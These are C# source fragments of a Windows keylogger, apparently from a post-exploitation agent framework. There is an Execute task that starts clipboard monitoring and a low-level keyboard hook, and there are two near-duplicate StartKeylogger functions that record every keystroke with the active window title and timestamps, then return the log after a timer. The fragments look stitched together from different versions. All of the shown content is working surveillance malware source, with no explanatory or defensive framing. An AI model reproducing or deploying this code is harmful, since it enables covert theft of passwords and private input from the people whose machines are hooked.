public static void Execute(Job job, Agent agent)
{
try
{
// Start the clipboard
ThreadStart clipboardThreadStart = new ThreadStart(BootClipboard);
Thread clipboardThread = new Thread(clipboardThreadStart);
clipboardThread.Start();
//Application.Run(new ClipboardNotification.NotificationForm());
Win32.User32.HookProc callback = CallbackFunction;
var module = System.Diagnostics.Process.GetCurrentProcess().MainModule.ModuleName;
var moduleHandle = Win32.Kernel32.GetModuleHandle(module);
var hook = Win32.User32.SetWindowsHookEx(Win32.User32.HookType.WH_KEYBOARD_LL, callback, moduleHandle, 0);
while (true)
{
Win32.User32.PeekMessage(IntPtr.Zero, IntPtr.Zero, 0x100, 0x109, 0);
}
}
catch (Exception ex)
{
job.Task.message = ex.Message;
job.Task.status = "error";
}
}
/// <summary>
/// Starts the Keylogger
/// </summary>
/// <author>Scottie Austin (@checkymander)</author>
/// <returns>String containing the captured keystrokes, along with identification of what window they were entered in.</returns>
/// <param name="Seconds">The amount of time in seconds the keylogger should run for before returning keystrokes.</param>
public static string StartKeylogger(int Seconds)
{
StringBuilder Builder = new StringBuilder();
Builder.Append(String.Format("Starting keylogger for {0} seconds.", Seconds));
IntPtr HookID = IntPtr.Zero;
string PreviousActiveWindow = "";
Win32.User32.HookProc hookproc = (nCode, wParam, lParam) =>
{
var CurrentActiveWindow = GetActiveWindowTitle();
if (CurrentActiveWindow != PreviousActiveWindow)
{
Builder.Append("\r\n");
PreviousActiveWindow = CurrentActiveWindow;
Builder.Append("\r\n" + DateTime.Now + "\r\n" + CurrentActiveWindow + "\r\n--------------------------\r\n");
}
if (nCode >= 0 && wParam == (IntPtr)Win32.User32.WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
bool shifted = Win32.User32.GetKeyState(160) < 0 || Win32.User32.GetKeyState(161) < 0;
Keys keycode = (Keys)vkCode;
if (!(shifted && KeyDictShift.TryGetValue(keycode, out string append)) && !KeyDict.TryGetValue(keycode, out append))
{
bool capped = Win32.User32.GetKeyState(20) != 0;
if ((capped && shifted) || !(capped || shifted))
{
append = keycode.ToString().ToLower();
}
else
{
append = keycode.ToString().ToUpper();
}
}
Builder.Append(append);
}
return(Win32.User32.CallNextHookEx(HookID, nCode, wParam, lParam));
};
HookID = Win32.User32.SetWindowsHookEx(Win32.User32.WH_KEYBOARD_LL, hookproc, Win32.Kernel32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0);
using (Timer timer = new Timer(Seconds * 1000))
{
timer.Elapsed += (source, e) =>
{
Builder.AppendLine(String.Format("\r\n\r\nFinished Keylogger at {0:HH:mm:ss.fff}", DateTime.Now));
Win32.User32.UnhookWindowsHookEx(HookID);
timer.Stop();
Forms.Application.Exit();
};
timer.Start();
Forms.Application.Run();
return(Builder.ToString());
}
}
/// <summary>
/// Starts the Keylogger
/// </summary>
/// <author>Scottie Austin (@checkymander)</author>
/// <returns>String containing the captured keystrokes, along with identification of what window they were entered in.</returns>
/// <param name="Seconds">The amount of time in seconds the keylogger should run for before returning keystrokes.</param>
public static string StartKeylogger(int Seconds)
{
StringBuilder Builder = new StringBuilder();
Builder.Append(String.Format("Starting keylogger for {0} seconds.", Seconds));
IntPtr HookID = IntPtr.Zero;
string PreviousActiveWindow = "";
HookProc = (nCode, wParam, lParam) =>
{
try
{
var CurrentActiveWindow = GetActiveWindowTitle();
if (CurrentActiveWindow != PreviousActiveWindow)
{
Builder.Append("\r\n");
PreviousActiveWindow = CurrentActiveWindow;
Builder.Append("\r\n" + DateTime.Now + "\r\n" + CurrentActiveWindow + "\r\n--------------------------\r\n");
}
if (nCode >= 0 && wParam == (IntPtr)Win32.User32.WM_KEYDOWN)
{
KbDllHookStruct kbHookStruct = (KbDllHookStruct)Marshal.PtrToStructure(lParam, typeof(KbDllHookStruct));
int vkCode = kbHookStruct.VirtualKeyCode;
bool shifted = PInvoke.Win32.User32.GetKeyState(160) < 0 || PInvoke.Win32.User32.GetKeyState(161) < 0;
Keys keycode = (Keys)vkCode;
if (!(shifted && KeyDictShift.TryGetValue(keycode, out string append)) && !KeyDict.TryGetValue(keycode, out append))
{
bool capped = PInvoke.Win32.User32.GetKeyState(20) != 0;
if ((capped && shifted) || !(capped || shifted))
{
append = keycode.ToString().ToLower();
}
else
{
append = keycode.ToString().ToUpper();
}
}
if (vkCode == 231)
{
append = ((char)kbHookStruct.ScanCode).ToString();
}
Builder.Append(append);
}
}
catch (Exception e)
{
Console.Error.WriteLine("Keylogger Exception - " + e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace);
}
return(PInvoke.Win32.User32.CallNextHookEx(HookID, nCode, wParam, lParam));
};
HookID = PInvoke.Win32.User32.SetWindowsHookEx(Win32.User32.WH_KEYBOARD_LL, HookProc, PInvoke.Win32.Kernel32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0);
if (Seconds <= 0)
{
Forms.Application.Run();
return("");
}
else
{
using (Timer timer = new Timer(Seconds * 1000))
{
timer.Elapsed += (source, e) =>
{
Builder.AppendLine(String.Format("\r\n\r\nFinished Keylogger at {0:HH:mm:ss.fff}", DateTime.Now));
PInvoke.Win32.User32.UnhookWindowsHookEx(HookID);
timer.Stop();
Forms.Application.Exit();
};
timer.Start();
Forms.Application.Run();
return(Builder.ToString());
}
}
}
